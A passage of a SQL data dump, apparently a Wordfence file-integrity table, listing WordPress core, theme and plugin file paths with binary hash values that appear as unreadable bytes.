��zW','',0,'?'),('w΄��[o��E�=','wp-content/themes/maxbusiness/js/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,��Y�Iu��W�Q�m�','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('}2۶Gg;6�yh�_2','wp-content/themes/sg-window/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�|�`9K�y�?���','5�M��� �\ZH�[�j�;�x$K�*��','',0,'?'),('�-g^<q�!�9��%�','wp-content/themes/advance/inc/kirki/assets/scss/customizer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H��V�\'\r!�w[','��G�@�������jA��i\\c��@��..L','',0,'?'),('�\'ѯ�H��o3kVX','wp-content/plugins/wp-cerber/assets/flags/to.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��Un��ze��','^�7��\r)���KFd��FG6B�����(\0_*','',0,'?'),('���ґ-���\r�{,�','wp-content/plugins/wordfence/lib/wfCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 ƿ����s�y��','|�uIP�wh5ڎ.m\"*n_�� 9����J�P�','',0,'?'),('�~��L��*�,�<:�','wp-admin/includes/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lp�Bd����Z�','�O� �n�uO\nd�7K[\"}��7\'p���`��`','',0,'?'),('��n~�\'YT�S#_2+�','wp-content/themes/cactus/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ho=\"���A�w','��c���\n���BhJύ�d�ӕ9p���N6�f','',0,'?'),('��KGEEӉЂ:i\"�','wp-content/themes/hueman/assets/admin/img/footer-widgets-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cp��/j���r�','C�\0�K�=șW����\\��*�q�41\n�*���','',0,'?'),('��ĈV�t�˾|#i�','wp-includes/wp-includes/js/dist/hooks.min.js',0,'<q@o�P��u����','<q@o�P��u����','+���(�������d��C%�\'��\Z��v��NR','',0,'?'),('���<�&�/k��5','wp-content/themes/kidzoo-lite/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xi�l��%�p�A�','�H�o,�8�Jz�����8�fm�ОVp%3','',0,'?'),('��:� r�YƸ�u','wp-includes/wp-includes/js/jquery/jquery.ui.touch-punch.js',0,'L�m�Q4փ��]�','L�m�Q4փ��]�','k>jT@���z�����՜.OB�j�0\'��t','',0,'?'),('�Sx��4�@o�w�N','wp-admin/js/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`k<,��j3�eE4��','��m����N��Dڽ��a�\r��q���1�i�[+','',0,'?'),('���P��dQ}\"mqH','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-slider-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��@:v\0���','�s�#�\Z~�je��W�_&X\"�;����_GC4�s�','',0,'?'),('�O�Gq���\0S{g���','wp-content/themes/anima/admin/images/magazine-3col.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TGo�0��\'RŷC���','���E�yf0C⛶��iS^wl��a�)?\\��+','',0,'?'),('�1;c��\"�+{߸','wp-content/themes/capacious/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g���aC��hXH�c�','��7v�S46���Zrm�j泅!3h;�P�&','',0,'?'),('���:m��[ݢ�:#','wp-includes/l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(��C�h���#','�Ǹ�9�1Y�����5$�?,=�M�2.��r�','',0,'?'),('�I��\\j���x���g','wp-admin/images/date-button-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?���a�0��9JQ\Z�','���*�Q����_(G:*��ηd������.','',0,'?'),('��f��+e^>�!\"o[','wp-content/themes/sg-window/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\<aY\r�\'�<�@9','��g�!d���7N@(�crb�m;yCG�t�','',0,'?'),('�]P�JQƀ6o֢��;','wp-includes/Requests/Exception/HTTP/428.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�B��}�^�t*','C�O�W%���tߏ�Y�|��&�0�V�\\�','',0,'?'),('���j7r[�,��Z��','wp-admin/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�,/����L�;�','��kNIM\0���ڿX\Z��S��ŁԾ��W�','',0,'?'),('�1U>��t�j�q����','wp-includes/wp-includes/js/jquery/ui/selectable.js',0,'!9�qf��H7�{B,�z�','!9�qf��H7�{B,�z�','W�b��v�(��F4��S�]���@Ĕ�ܾ�','',0,'?'),('4��B�\07qoB�o6�','wp-includes/blocks/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z<!�U�n��_�eQB','Pn�2���&�Y!�>P�ٙ�{�q61����p','',0,'?'),('\Z��lm��@��','wp-includes/customize/class-wp-customize-date-time-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��ch�L��F�3�b','�!V���#|��:�{Ǎ.a����(�[y�O%','',0,'?'),('�-��\'g���P�\\�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�V�#ҹ���4�','Gp�f��Hv����\Z��x�8����1C�[�4A','',0,'?'),('���}��>�|��I','wp-content/themes/twentynineteen/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����?����/��L��','v��b3샪k\n!{;�]��\\�;~=J�8����','',0,'?'),('D.��h�9��Q���','wp-includes/wp-includes/blocks/media-text/block.json',0,'M�0�y���~_>2�','M�0�y���~_>2�','ɗU�(���S�t��R��QYq�ex}I\'��P','',0,'?'),('D�8hFޛBViR�','wp-admin/css/colors/blue/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�]Nt�f��B}o ]','�q�̿��j�d���eo\n�%�;�����','',0,'?'),('L,\Z\"�\0C�ʡ8y�','wp-includes/js/dist/primitives.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��������\\�ӷ*','ج�BTOȄ\r�$C�O�e=h���Ĥ_0��.�','',0,'?'),('U�R�8������[','wp-content/themes/hueman/functions/plugins-compatibility.php',0,'l4� g���p������','l4� g���p������','j��hm��E��P #ysT�s��K<���Jj�','',0,'?'),('j���q.�*;��2','wp-admin/css/colors/sunrise/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�#���o\"x��<�','��i�!��\'��j�T+d�Q��B�K�D@h4�G','',0,'?'),('t�)�}�Sj-��Ҍ','wp-content/themes/event/inc/settings/event-common-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]\0��#-{R�L�','��[�����4�:w�NT\Z���M��1�Z�x','',0,'?'),('w�es��i<�O�J%�','wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ~��ZJ�yΧ�%���','�hH��M����7�m��\'iB�@�>�','',0,'?'),('�2l�8G3��?� ','wp-content/themes/advance/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�刎ٌMZ�W���','�%aܾ6�1#b��{�;.!���ߤ�*w','',0,'?'),('�Ը��%\ZD�y�Z','wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�$u�e|)�\'aD�k�','�cA���P/Ɖ���wޝʐ#ۋ�\\�`','',0,'?'),('�S������}6�Y','wp-includes/wp-includes/js/jquery/ui/tabs.js',0,'+�73�l��c�P���R','+�73�l��c�P���R','��{�fT�k��3Ub�� AxT�8?�чaݯ�','',0,'?'),('�Z��d*��Y��ژ�','wp-content/plugins/wordfence/views/options/block-all-options-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5f����Җ�Ph�','�K;��C��l]�?`w9�0����CmĂ�N�','',0,'?'),('�-g�`�G�5~<','wp-content/themes/gambit/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�տQ.e��<2�a���','�*F[�d��z�Oq�X<y�%ӈڑ9��x��','',0,'?'),('�ӎA}ҎWZ5=*t�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b;v\'�g��~����k','m�!�M��J\"v�>,���0�\0՜ɫ� &jِ�','',0,'?'),('�ޫ� Y�z0���','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-group-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�εSs�7�hE���!','��r�s�,�1=e�S{��i� �i�0~��n','',0,'?'),('�*��k�um1=-���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IW B���>ToR��J','8ȼ�?$[�g1N4}��{�Y�K�J�$��C90','',0,'?'),('���ԫ���G','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery.png',0,'�_���Pw��PU�4','�_���Pw��PU�4','<W~���ض��+�hN��9��1�_�3�w�s','',0,'?'),('�r�W�3���V','wp-admin/css/color-picker-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�p�ES���c�V','�<�=\0�[Z\n2|닢��\0?6������������','',0,'?'),('���>9}j�3mH{�','wp-content/themes/hueman/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��J(��,�Q�k��','�|�cM�P8%X�1�}��(DX݁�n�\0\r\'��','',0,'?'),('@�9����%4�y','wp-includes/wp-includes/widgets/class-wp-widget-meta.php',0,'ha�+��ޭj�s2���','ha�+��ޭj�s2���','f��\r`.\\�۬\r�����H�Pg���!M�w�m��','',0,'?'),('�x}@;�=��ii','wp-content/themes/storeone/js/simple-lightbox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�^�\0�0Fi �]','�w��2��5�J.�܀ӗ��1G�T�4��/�W�','',0,'?'),('�ѵd1\r��\ZUB�S>','wp-content/themes/event/inc/customizer/functions/sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{G��\"-Qe�c�','kO`�nXV�\0�ڝ�\Z\r���kTN�aw9pH�n','',0,'?'),(':�X��2�M��~��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�4vLhN�!��2|','���3iA(���p���GD��ڔ����','',0,'?'),('>�SA��^���Ž','wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.js',0,'���\\��5^����','���\\��5^����','[�B�\Z,;��j�fe�MU�j|)�rv��>U�F','',0,'?'),('@%�e��ܾY���W','wp-content/themes/wp-barrister/library/images/shadow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3]���.�@\\�','�)>8�Հ�,Ki��X�ܹ��g�2@\0��R�:','',0,'?'),('C�y��8�\'a���','wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0mj���Ԟ�W','�͛=��ېI�hK�g\0��%T.��]��\r��~','',0,'?'),('L���8��\\�ݼ+','wp-admin/images/imgedit-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��\'��6U�������t','�?�؎)�.l�����%�<�(�_� 6�`^c7','',0,'?'),('Y�U��h|kU$��;','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��DZc�ժ�h�Ǘ�','x\n�� �sd��26*�P�ꫡ�f�t��45�bz','',0,'?'),('Z��T�:rIG�g\\�','wp-includes/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',0,'�ZƾB�,J)T�cx','�ZƾB�,J)T�cx','\0IM���|%�c��t�\0�Φ���q��s��5','',0,'?'),('\\�>�<u0!�>w�','wp-includes/wp-includes/class-phpmailer.php',0,'\'��F!;� 24�&','\'��F!;� 24�&','G��ZG����5�_ܚ��XS[W��S:9p@�?�','',0,'?'),('m�ñ�~���R�?','wp-content/plugins/wordfence/views/tools/options-group-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�!�aJ:e��c�','3|h|��Kqh�{� \r7��kH��\\�~e�l-�','',0,'?'),('p۞�2N<:Z�7�r�','wp-includes/js/tw-sack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������9>���','{�n]�\0ֈ��n�\r����<�w˷X)���:','',0,'?'),('s��p;��燁�;-F�','wp-content/themes/advance/inc/widgets/advance_welcome.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R$v�K�H|�Ykh}\Z��','5�(��o���Ȥ�va��p�H���iI��XG)','',0,'?'),('u�)8FG9�C�(���','wp-includes/js/wp-ajax-response.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/pM]�{\"@���s�:l�','�B�HQW�2����a��w��C���- Y��','',0,'?'),('�eBU\\k�h�tK_�6*','wp-includes/blocks/subhead/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�L[� ���3�','��DX�+C�]�D�$W+�f��yi><�\\�4��','',0,'?'),('����9�~\0{@���','wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i����oAP��=a�','9s����Z��D×e}���vu�O���','',0,'?'),('�u�t�� ��ɪ��','wp-content/plugins/wp-cerber/assets/flags/es.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݵ�*M,M\'A@��K�','�c`M�Cu��6�ם)X�%|G�W��ִ�>','',0,'?'),('���G�7�9K���I|�','wp-content/themes/vision-lite/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5�����ޠ�[�','\\�<-�+e���b�v�0��̥#�ƿ��_','',0,'?'),('���Clo�������','wp-admin/nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���� �H��3rƕMz','��ǃ�ĥ��<��##>z��&�P�-r ����','',0,'?'),('�s9�ӡP��kF�#��','wp-content/themes/Kent/slider.php',0,'L��Out�L�ڥU>�','L��Out�L�ڥU>�','�z��[V�8�^���aJ��&%�D�v;�� ��','',0,'?'),('�\Z��s��!�η���','wp-content/themes/promote/inc/kirki/includes/scripts/class-kirki-scripts-loading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"��_�[T������','��P�(�Y`���A�[b�v�z>з3w\n','',0,'?'),('�&� Y�tz(�\Z��','wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j.\\�0*��� [����','f���8��\'!�RF���L���˙^�w��','',0,'?'),('��I<���U�CMdZ�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\nA�I�g��+��.','5�N叜p�o\'�GYNsC�IS��>LJ�','',0,'?'),('��-��i>bs��1�','wp-includes/js/jquery/ui/resizable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c0�N^�l�����L��','�~��i�{Q���ԯ��֕���YdF�w\r,�Ϲ','',0,'?'),('\r�X�$�L�\'����','wp-content/themes/advance/inc/kirki/includes/class-kirki-enqueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�90�����>%�Hx','�²�B�/ :5�en�y�r1A�/Ң�1��','',0,'?'),('�*$��!�mG��sc','wp-content/themes/event/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}*�t̘��Tրbs','��g���~��0L�Ҁ�9�ɹ Zo�.E','',0,'?'),('\'Y���֖�>v�ǡ','wp-content/plugins/wp-cerber/assets/flags/td.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��б�n�HБ�����','��rJ���VO>\Z~dƨn`ik\Z����\\','',0,'?'),('9x�U�ò�m3/�_-�','wp-content/themes/promote/inc/kirki/assets/js/controls/multicheck.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\��Q�bP1�U�IS�','EDF/8��(��5`1AĶ�&�����P0@N','',0,'?'),('9�L�/gJ�)3','wp-content/plugins/wp-cerber/assets/flags/bt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�@^؟J�H;��2:',' ��\'��A-��êu��rdƹ��Q����','',0,'?'),('@������4����@�:','wp-content/themes/twentytwenty/template-parts/content-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���oh7��\\�+�','�ea::����8�Af�����J�;��Ak\n','',0,'?'),('`B��e���`�l`�','wp-content/themes/hueman/option-tree/includes/ot-meta-box-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�tvSBU(�_���?đ','s��oZ��\"����Σ���c�\'��JJ�i� ��','',0,'?'),('h��!��:�~̛���','wp-content/themes/advance/inc/kirki/assets/scss/controls/dashicons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#R��C8u?2T:�Gڅ','�G��\"�]icsҺ���҂�ڒ�(���','',0,'?'),('m0\"r��4�R�u','wp-includes/wp-includes/js/zxcvbn-async.js',0,'=�$a�[ZF)^\n��~','=�$a�[ZF)^\n��~','�uQ9ҫ{��7o}�����`�-nW�','',0,'?'),('m��D�ڜ�(�\r���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3R��d#\r\"���%','��ݩF�s�3G����b�8������N�@��X','',0,'?'),('po.�3 c��o��<�','wp-content/themes/spidermag/assets/library/owlcarousel/js/owl.carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lb�[�D(.��B�bY','^S����B�ŅZ�C8�\\s�P��c7M��[\n','',0,'?'),('~��Y��(�C��','wp-includes/wp-includes/css/dist/block-library/common.min.css',0,'��XBI���mC�','��XBI���mC�','Q�E��e��\r��_�1�Pj���W�r�','',0,'?'),('��4r�%����j���','wp-includes/SimplePie/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�~Hwb�x��xsٷ:�','0���sD���;��P�=�\'��2� ��\0Df��','',0,'?'),('��KS+�eA�@��','wp-admin/css/colors/light/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��Y�Hn T��5^�','��Y�y�7B۩���/�c��$r��&���Z','',0,'?'),('�������(���','wp-content/themes/Yegor/archive.php',0,'�.�+��)�#\Z�ߙ�','�.�+��)�#\Z�ߙ�','2@N�=�e�9�)�&�,�b$pX�#UE�','',0,'?'),('���C4����:8�','wp-content/themes/travel-stories/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5W.JO�g��Nz���','�b�SSJ�Y�w�Me�P�iUV۩5&8P�','',0,'?'),('��1H*, �^J','wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�=\rM��]_f���u','���ҕm���ޅL�+��\0P��}>���','',0,'?'),('�����Fe� 57[�','wp-content/plugins/wordfence/lib/email_newIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��3岛�u�`�At','m)Th�)�\"=>�#a���Z;V<\0`�h �5�w','',0,'?'),('����UNEA�g�t','wp-includes/js/customize-selective-refresh.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uP岉�0x\Z�����','��q�˖jZC~����<sħ+�RI!�H��','',0,'?'),('���\r�ٲX�[���','wp-content/themes/promote/footer/part-footer1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�t�xNM HdY,���','��xR�FT{q�]��d�V�V+�}�~a/�','',0,'?'),('�A�o�!�V��ų`v','wp-content/wflogs/ips.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('�zj�8FU�~eq�$�','wp-content/themes/auberge/sidebar-front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T:/4e��U�η�','��Nm����\n�3�n�Կswt�)�M}�','',0,'?'),('�*v��@:ᔑ���?','wp-content/themes/hueman/assets/admin/img/footer-widgets-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1c��Y��. �\\R\Z','C��q����A�ba��T*T�Cl~rf��4�','',0,'?'),('��l�Uy:e4�N1ϻo','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]/�\0��7��(r��^','8U���GS�����5���l��rx���\\)��\n','',0,'?'),('�+V�En�\"Ŝ��F�','wp-content/themes/spidermag/sidebar-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"͊�A氧��r�%ϣ','Ao0m�p<��&bjZ����rx*���<ߴ�f�','',0,'?'),('�X�������EA��','wp-includes/wp-includes/blocks/missing/block.json',0,'�$�YԺ\"9N�Rt�f','�$�YԺ\"9N�Rt�f','k�E�E��+�hR�aw����߸��0{`����','',0,'?'),('j���n%Ut����','wp-content/themes/sg-window/img/icons/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۱D���=�c�JP�)�','��==o�͘3�J����e�=�W]N�\0�ϥ�','',0,'?'),(' o��ƕ��t_��\0.�','wp-content/plugins/wordfence/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ص���k�:]����','I���p��A�B�i���7��0rME�$}�y�','',0,'?'),('%~WN82��Q�O���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4�F��0JC� n��k','�Cb,���\"�\">j���Ŋ��AlD�','',0,'?'),('1�䝆�4�v�j�.','wp-content/themes/maxbusiness/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�z\"���y>��','�h�c���f.B�jz����nt�_m��-o�','',0,'?'),('=��Yx9ɚ�M \r�l�','wp-content/themes/newsmag/assets/vendors/offscreen/offscreen.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TiI��-�l�jq �K','�ZpZ��K��0�Еl���L����N�����','',0,'?'),('G�%%�as)~^j��ؾ','wp-includes/wp-includes/js/customize-models.min.js',0,'/�o�ϱ;��Rwc','/�o�ϱ;��Rwc','.a���x��^�g[&�E�ΡJJ�T�SՀ�','',0,'?'),('Iy�_\ZeA���@?','wp-content/themes/hueman/assets/front/img/demo/3-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L`����˺��','�]��݊�GފԨ�R�85�,QF�%�� !q��(','',0,'?'),('I���ƻ5��ΐ�P�','wp-content/themes/pine/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l `�+Y�5�ֆ�N','R\"���j��q�,%N����uu���+6�?���','',0,'?'),('Mc.>&�P�-i��G�','wp-content/themes/showcase-lite/template-full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��*�� (jGh�','�N�J�hj�-T����7�����6��d','',0,'?'),('\\���\Z�e �)��Up','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȑH�\Zb�>V�D��R2','rћJԑI/�\nO�Y}�x��ņ����U ','',0,'?'),('o�ƙv����$��','wp-includes/wp-includes/js/dist/vendor/wp-polyfill.js',0,'7E�~?V�֬��o�B','7E�~?V�֬��o�B','b1�r�������J�w���./2�M��`','',0,'?'),('w���+\0���2�R','wp-includes/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zjo�\0��y,�*�}c','2p\"Wj����s�lf&S@�[�\\��\"W�','',0,'?'),('��4��t!��BŌ��,','wp-content/plugins/wordfence/js/wfglobal.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0>q� � ^�&�4r�&','���V�\"��_���+�J\0��_���>�J�','',0,'?'),('��� R��\'�\r��X','wp-content/themes/Endolf/footer.php',0,'WK�1t�\"3�L��','WK�1t�\"3�L��','��5��O_q�����P��W�[%!`@SQ����','',0,'?'),('�-��B��|tS^�','wp-includes/customize/class-wp-customize-nav-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ԡ�P�\n}�$','�vG~?t7\0��h�R,��|�]9��p�.J�w','',0,'?'),('�ECW��`�`��-�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_@�e���3�b��B','�L�ؤ@J�9OhG�@@��Z!��\08#l�(','',0,'?'),('��=�*�����R�','wp-includes/wp-includes/widgets/class-wp-widget-media-audio.php',0,'O�P��/:���#�A','O�P��/:���#�A','��P����!jz�F#�����d�ĚMP','',0,'?'),('��+���>��\"�s�','wp-includes/wp-includes/images/xit-2x.gif',0,'�Ӂ�u:@4\r���z<5�','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�t��d!b��ɪ�','wp-content/plugins/wp-cerber/assets/flags/tv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JP��ށ��J�','۽����ɇR�ZN��P����bX�c9h;��','',0,'?'),('���@߱�:�J�','wp-includes/wp-includes/SimplePie/XML/Declaration/Parser.php',0,'�O,@�ۺ�a� Δ��','�O,@�ۺ�a� Δ��','��im�Q�q+��\r��:�Po����\Z*�����','',0,'?'),('�_v�DO�2��\ZT�/','wp-includes/wp-includes/css/wp-auth-check-rtl.css',0,'N�P��KN��zj��K','N�P��KN��zj��K','V<e�b��(�k��I��2�\ZÜu�/#4Ɇmz','',0,'?'),('�<�CZt�\0Vw\'','wp-content/themes/promote/inc/kirki/assets/js/vendor/tinymce.plugin.code.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zk���G2��\n�g�O��','Z���\n����Km���}-��7��z��\"t k','',0,'?'),('�S˪�\n��B�V\"','wp-includes/fonts/dashicons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�3$_�n��5��X',';ʐ\'8�4aOoY8-U�62���K�qq�$B�x','',0,'?'),('��\\��h\Z��)Ġ�','wp-includes/blocks/paragraph/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�T;��_Bjf�����','�Ƈ4pc���[<3iԁv�D������How<','',0,'?'),('�*Q. �-c�%�D','wp-content/plugins/wordfence/lib/flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��c�磭��c�-','8�Y��CO���0�j{�\Zx��D�Ė��x�O�','',0,'?'),('�Qͩ�D���L̬_','wp-content/themes/maxbusiness/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�/�C�=9(qa���','�k�W;xdb�v�s~��e=&���@(�2\0�','',0,'?'),('��dJ��ri�4O�p�','wp-content/themes/Endolf/FT/license-html.php',0,'��� �,��ۓ��X��H','��� �,��ۓ��X��H','����Y��XjМ�������%,�]���&k��','',0,'?'),('�v|Q/B}�M�\r`��','wp-includes/wp-includes/js/dist/api-fetch.js',0,'-zLܗ�G��3�|4y','-zLܗ�G��3�|4y','e�9����x^h�Ǔ|B�1u��2t�\'�Y�\n ','',0,'?'),('`���|b1���Y','wp-content/themes/storeone/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ev�h1^�IF1�?�W','uס���KC�$��J\"���4�w}b�\Z��','',0,'?'),('��ܡ9�u_\\\n�9�\'','wp-admin/css/color-picker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���x��Ti6���','ۣq��T��zu���Oi�\\�5ЯY�u��~=c','',0,'?'),('�KU�g0MU�/��ʇ','wp-admin/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xo��_���Բ)\n��r','�(�Z!.�e��TU92;�����ݏt5o�^','',0,'?'),('\Z[�`��0CI$T��\'�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�H��$I�3��^0','Dsmr?v�jz����Mo�3=b0���K�R#','',0,'?'),('+�8w�p�pԸgb�','wp-content/themes/promote/inc/kirki/assets/js/l10n.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�Sve�䤀��tQ�','����3�R�{��s�w��\r+Y~\0e�Ó=թ$','',0